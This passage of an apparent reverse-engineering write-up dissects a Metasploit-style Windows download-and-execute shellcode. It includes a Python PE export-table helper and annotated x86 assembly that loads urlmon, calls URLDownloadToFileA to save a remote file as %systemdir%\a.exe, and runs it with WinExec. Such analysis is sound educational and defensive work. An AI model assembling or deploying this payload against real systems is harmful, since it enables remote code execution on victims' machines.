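
E_LFANEW         = 0x3C         # IMAGE_DOS_HEADER.e_lfanew                     MOV ESI,[EBX+0x3C]
EXPORT_DIR_ENTRY = 0x78         # 0x18 (FileHeader) + 0x60 (DataDirectory[0])    MOV ESI,[ESI+EBX+0x78]
IMAGE_BASE       = 0x77E80000   # the XP SP2 KERNEL32 base quoted above; illustrative only


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def cstring(buf, off):
    return buf[off:buf.index(b"\x00", off)]


def build_image(named, ordinal_only=()):
    """Constructed minimal PE32 image (not a real DLL): DOS header, NT headers and
    one export directory at RVA 0x200. `named` maps export name -> function RVA;
    `ordinal_only` lists RVAs exported without a name, which is what makes
    NumberOfFunctions differ from NumberOfNames."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    pe = 0x40
    struct.pack_into("<I", img, E_LFANEW, pe)
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, pe + 4, 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)  # _IMAGE_FILE_HEADER
    struct.pack_into("<H", img, pe + 0x18, 0x10B)                              # OptionalHeader.Magic = PE32
    struct.pack_into("<I", img, pe + 0x18 + 0x5C, 16)                          # NumberOfRvaAndSizes

    names = sorted(named)
    nfuncs = len(ordinal_only) + len(names)
    export = 0x200
    funcs = export + 0x28
    name_ptrs = funcs + 4 * nfuncs
    ordinals = name_ptrs + 4 * len(names)
    strings = ordinals + 2 * len(names)
    struct.pack_into("<IIHHIIIIIII", img, export,
                     0, 0, 0, 0, 0, 1, nfuncs, len(names), funcs, name_ptrs, ordinals)
    struct.pack_into("<II", img, pe + EXPORT_DIR_ENTRY, export, 0x400 - export)  # DataDirectory[0]
    for i, rva in enumerate(ordinal_only):            # unnamed exports take the low ordinals...
        struct.pack_into("<I", img, funcs + 4 * i, rva)
    for i, name in enumerate(names):
        ordinal = len(ordinal_only) + i               # ...so name index != function index
        struct.pack_into("<I", img, funcs + 4 * ordinal, named[name])
        struct.pack_into("<I", img, name_ptrs + 4 * i, strings)
        struct.pack_into("<H", img, ordinals + 2 * i, ordinal)
        img[strings:strings + len(name) + 1] = name + b"\x00"
        strings += len(name) + 1
    return bytes(img)


def find_export(image, wanted, loop_bound="names"):
    """Name -> ordinal -> RVA, the three table hops in the listing above.
    loop_bound="functions" iterates NumberOfFunctions the way the shellcode does.
    Returns (rva or None, number of name-table reads that went past its end)."""
    pe = u32(image, E_LFANEW)
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    exp = u32(image, pe + EXPORT_DIR_ENTRY)
    nfuncs, nnames = u32(image, exp + 0x14), u32(image, exp + 0x18)
    funcs, name_ptrs, ordinals = u32(image, exp + 0x1C), u32(image, exp + 0x20), u32(image, exp + 0x24)
    count = nfuncs if loop_bound == "functions" else nnames
    past_end = 0
    for i in range(count):
        if i >= nnames:                 # AddressOfNames has only nnames entries;
            past_end += 1               # the real loop would read the ordinal table here
            continue
        if cstring(image, u32(image, name_ptrs + 4 * i)) == wanted:
            ordinal = u16(image, ordinals + 2 * i)              # AddressOfNameOrdinals[i]
            return u32(image, funcs + 4 * ordinal), past_end    # AddressOfFunctions[ordinal]
    return None, past_end


def virtual_address(rva):
    return IMAGE_BASE + rva


if __name__ == "__main__":
    # GetProcAddress RVA from the table above; the other two RVAs are constructed.
    img = build_image({b"GetProcAddress": 0x1564B, b"WinExec": 0x5A2C0, b"ExitThread": 0x1B6A0},
                      ordinal_only=(0x9000,))
    rva, _ = find_export(img, b"GetProcAddress")
    print(f"GetProcAddress RVA {rva:#x} -> VA {virtual_address(rva):#010x}")
    print("missing name, shellcode-style bound:", find_export(img, b"NoSuchExport", "functions"))
```

The example compares the whole NUL-terminated name, whereas the shellcode only compares the first 0xE bytes, so a longer export starting with the same fourteen characters would match in the original but not here.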

The rest of the functions from KERNEL32.DLL which the shellcode uses are looked up with GetProcAddress() in a loop. Each function address is stored on top of the strings at the end of the shellcode. (i.e. It overwrites "GetProcAddress\0GetSystemDirectoryA\0" …etc.)

mov edi, edx        ; 8B FA       ; EDX points to string table
mov esi, edi        ; 8B F7       ; And so now EDI and ESI point there too
add esi, byte +0xe  ; 83 C6 0E    ; "GetProcAddress" is 0xE bytes long, skip it.
mov edx, eax        ; 8B D0       ; The address of GetProcAddress()
push byte +0x4      ; 6A 04       ; Number of names (after "GetProcAddress") to lookup in KERNEL32
pop ecx             ; 59          ; ECX = 4 names to lookup
call GetFunctions   ; E8 50000000 ; ------



; FARPROC WINAPI GetProcAddress(
;   __in  HMODULE hModule,
;   __in  LPCSTR  lpProcName
; );

GetFunctions:
xor eax,eax         ; 33C0 ; EAX = 0
lodsb               ; AC   ; EAX = byte [ESI]; assumes DF=0 I guess
test eax,eax        ; 85C0 ; Check if at end of function name string
jnz GetFunctions    ; 75F9 ; The loop advances ESI to the end of
                           ; this string and start of next
push ecx            ; 51   ; Loop counter: 4,3,2,1
push edx            ; 52   ; GetProcAddress function address
push esi            ; 56   ; lpProcName = ESI = Start of name string in list
push ebx            ; 53   ; hModule = KERNEL32 base address or URLMON base address
                           ; GetProcAddress(hModule [in], lpProcName [in])
call edx            ; FFD2 ; EAX = GetProcAddress(EBX, ESI)
pop edx             ; 5A   ; GetProcAddress function address
pop ecx             ; 59   ; Loop counter: 4,3,2,1
stosd               ; AB   ; Store Function Pointer, EAX, at [EDI]
loop GetFunctions   ; E2EE ; Lather, rinse, repeat
xor eax,eax         ; 33C0 ; Return zero upon success?
ret                 ; C3   ; _______________________________________

db "GetProcAddress",0      ; EDI starts at this address.
db "GetSystemDirectoryA",0 ; After loading URLMON becomes [edi-0x14]
db "WinExec",0             ; After loading URLMON becomes [edi-0x10]
db "ExitThread",0          ; After loading URLMON becomes [edi-0x0C]
db "LoadLibraryA",0        ; [edi-0x04] After loading URLMON becomes [edi-0x08]



add esi, byte +0xd   ; 83C60D      ; ESI was at start of "LoadLibraryA\0" which is 0xD long
push edx             ; 52          ; GetProcAddress function address
push esi             ; 56          ; lpFileName = ESI points to "urlmon\0"

; HMODULE WINAPI LoadLibrary(
;   __in  LPCTSTR lpFileName
; );

call near [edi-0x4]  ; FF57FC      ; EAX = LoadLibrary(ESI)
pop edx              ; 5A          ; GetProcAddress function address
mov ebx, eax         ; 8B D8       ; Handle to URLMON module
push byte +0x1       ; 6A 01       ; Number of names to lookup in URLMON.DLL
pop ecx              ; 59          ; ECX = 1 name to lookup
call GetFunctions    ; E8 3D000000 ; ------
add esi, byte +0x13  ; 83 C6 13    ; ESI was at "URLDownloadToFileA\0" so move past it
push esi             ; 56          ; szURL = ESI points to URL

db "urlmon",0             ;
db "URLDownloadToFileA",0 ; becomes [edi-0x04]

Calling Functions (finally at last)

The URL is terminated with a 0x80 byte rather than a 0x00. Since the URL string is never encoded, this is probably an attempt to avoid null bytes, even to the very end!


strlen_80:
inc esi              ; 46     ; Next letter of URL
cmp byte [esi],0x80  ; 803E80 ; Is it the end?
jnz strlen_80        ; 75FA   ;
xor byte [esi],0x80  ; 803680 ; At end of URL, change 0x80 into a 0x00
pop esi              ; 5E     ; szURL = ESI points to URL

This just gets the path to the System32 directory.


; UINT WINAPI GetSystemDirectory(
;   __out LPTSTR lpBuffer,
;   __in  UINT   uSize
; );

sub esp, byte +0x20   ; 83EC20 ; Make some space for the string on the stack
mov ebx, esp          ; 8BDC   ; EBX = lpBuffer
push byte +0x20       ; 6A20   ; uSize = 0x20 bytes
push ebx              ; 53     ; lpBuffer (0x20 bytes on stack)
call near [edi-0x14]  ; FF57EC ; EAX = string length = GetSystemDirectoryA(EBX, 0x20)

The string "\\a.exe" is appended onto the end of whatever GetSystemDirectory() returned, and the file downloaded from the URL is written to that path.


; HRESULT URLDownloadToFile(
;   LPUNKNOWN            pCaller,
;   LPCTSTR              szURL,
;   LPCTSTR              szFileName,
;   DWORD                dwReserved,
;   LPBINDSTATUSCALLBACK lpfnCB
; );

mov dword [ebx+eax], 0x652e615c     ; C704035C612E65   ; lpBuffer + length = "\\a.e"
mov dword [ebx+eax+0x4], 0x6578     ; C744030478650000 ; lpBuffer + length + 4 = "ex"
xor eax, eax                        ; 33C0             ; EAX = 0 if that wasn't obvious
push eax                            ; 50               ; lpfnCB = 0
push eax                            ; 50               ; dwReserved = 0
push ebx                            ; 53               ; szFileName = %systemdir%\a.exe
push esi                            ; 56               ; szURL = URL at end of shellcode
push eax                            ; 50               ; pCaller = 0
call near [edi-0x4]                 ; FF57FC           ; URLDownloadToFileA(0, ESI, EBX, 0, 0);

Y'all know what's coming next... WinExec!



; UINT WINAPI WinExec(
;   __in  LPCSTR lpCmdLine,
;   __in  UINT   uCmdShow
; );

mov ebx,esp           ; 8B DC  ; EBX points to %systemdir%\a.exe
push eax              ; 50     ; uCmdShow = either S_OK or E_OUTOFMEMORY or INET_E_DOWNLOAD_FAILURE
                               ; I think what is intended is uCmdShow = 0
push ebx              ; 53     ; lpCmdLine = %systemdir%\a.exe
call near [edi-0x10]  ; FF57F0 ; WinExec("%systemdir%\\a.exe",0);


And that's it, we're basically done, so exit. Note, if someone wanted to fix the EXITFUNC feature for this in MSF, you can either store ExitThread or ExitProcess in the string table (the arguments are the same, but their lengths are off by one) or modify the shellcode logic itself. I'm very tempted to make the changes myself, but I've got a bunch of other stuff I need to get done this week.

(The easiest, but least elegant fix is to just swap out all the encoded strings starting at 0x10A and going all the way to the end.)


; VOID WINAPI ExitThread(
;   __in  DWORD dwExitCode
; );

push eax              ; 50     ; ERROR_BAD_FORMAT or ERROR_FILE_NOT_FOUND or one
                               ; of the other things WinExec() might return.
                               ; It's 32 or over on success
call near [edi-0xc]   ; FF57F4 ; ExitThread(EAX)

Let me know if I've made any errors in this write-up. I was too lazy to check most of this out in a debugger; it's all come directly out of my head.

I've put an easy-to-assemble version of all this here:


Note that NASM uses the alternative instruction encodings for some x86 opcodes, so you won't get the exact same binary out of NASM as the original in MSF. If you don't know what this means, then don't worry, I'll explain it later.

Exercises for the reader

  1. Why does the shellcode use GetProcAddress() to look up the rest of the function names instead of the code which looked up "GetProcAddress" from the KERNEL32.DLL export table in the first place?

  2. What other shellcode has the same NumberOfFunctions versus NumberOfNames usage bug as this?

  3. What other shellcode uses %systemdir%\a.exe versus something else?

  4. What happens if URLDownloadToFileA() fails?